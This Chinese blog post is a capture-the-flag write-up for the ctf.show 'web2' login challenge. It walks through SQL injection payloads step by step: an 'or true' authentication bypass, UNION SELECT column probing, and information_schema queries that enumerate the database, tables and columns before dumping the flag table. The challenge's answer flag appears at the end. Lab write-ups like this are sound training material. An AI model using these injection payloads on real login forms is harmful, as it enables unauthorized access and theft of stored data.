ctf.show_web2

最新推荐文章于 2024-05-18 18:45:00 发布

小支柱

最新推荐文章于 2024-05-18 18:45:00 发布

阅读量431

点赞数

分类专栏： ctfshow靶场 ctf靶场文章标签： web安全安全网络安全

本文链接：https://blog.csdn.net/liyuwei888/article/details/124705014

版权

SQL注入万能密码数据库爆破 flag获取 CTF挑战

关键词由CSDN通过智能技术生成

ctfshow靶场同时被 2 个专栏收录

1 篇文章 0 订阅

订阅专栏

ctf靶场

1 篇文章 0 订阅

订阅专栏

题目：

<html lang="zh-CN">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, initial-scale=1.0" />
    <title>ctf.show_web2</title>
</head>
<body>
    <center>
    <h2>ctf.show_web2</h2>
    <hr>

        <form method="post">
        用户名:<input type="text" name="username"><br><br>
        密&nbsp;&nbsp;&nbsp;码:<input type="password" name="password"><br><br>
        <input type="submit" value="登陆">
        
    </form>
    </center>

</body>
</html>

解题思路：

题目是登陆框，猜测是SQL注入。先对万能密码尝试

password=1&username=1' or true #

![image.png](https://img-blog.csdnimg.cn/img_convert/961171a0a4ead9652e3530259af2aee0.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u6770cdf5&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=86480&status=done&style=none&taskId=u56a08447-d029-4923-ba8b-1954db4bd80&title=&width=1536)
果然存在SQL注入，但是没有flag回显。可能考点并非万能登陆，而是flag存放在数据库里。接下来爆一下ctfshow的占位符是几

password=1&username=1' union select 1,2,3 #

![image.png](https://img-blog.csdnimg.cn/img_convert/ed694841fc883983c27f437e58c1e39a.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u12714eba&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=95716&status=done&style=none&taskId=uad8d60f3-e8af-4bcb-b464-42b32718285&title=&width=1536)
已知占位符是2，开始爆数据库库名

password=1&username=1' union select 1,database(),3 #

![image.png](https://img-blog.csdnimg.cn/img_convert/92d62a8a6b94795df2b2b22a83966de9.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u1caacf13&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=98153&status=done&style=none&taskId=u4a5b2657-60ba-40db-adcc-a7e1e711057&title=&width=1536)
已知数据库库名为web2，继续爆数据库表

password=1&username=1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3 #

![image.png](https://img-blog.csdnimg.cn/img_convert/53cdd1a0c1592749d445433f06773836.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u1204504f&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=105918&status=done&style=none&taskId=u823803b9-9fc4-4660-b922-e6e7b7a92ec&title=&width=1536)
当前已知表名是flag和user这两个表，很有可能flag在flag表中或者flag在flag表的字段里。继续爆字段

以下两种payload均可

password=2&username=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='flag' #

password=2&username=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() #

![image.png](https://img-blog.csdnimg.cn/img_convert/dbc88ee2e05d2acc04c50a08386a358c.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=uf2152f2a&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=102001&status=done&style=none&taskId=u18486a51-ecfa-4d1c-b3da-163a9ee5ffc&title=&width=1536)
之前一直没找到flag，flag也许就藏在表内容里了。最后爆出flag表中的内容

以下两种payload均可
password=2&username=1' union select 1,(select * from flag),3 #
password=2&username=1' union select 1,(select flag from flag),3 #

![image.png](https://img-blog.csdnimg.cn/img_convert/89721a792d68ffb83f85d00186edfe15.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u4324edfa&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=94195&status=done&style=none&taskId=u0ba82ce0-ffd6-481f-be07-9ca3815a7d2&title=&width=1536)
获得题目flag为：ctfshow{1aefca01-afd4-4527-a35b-c5a8be893ae0}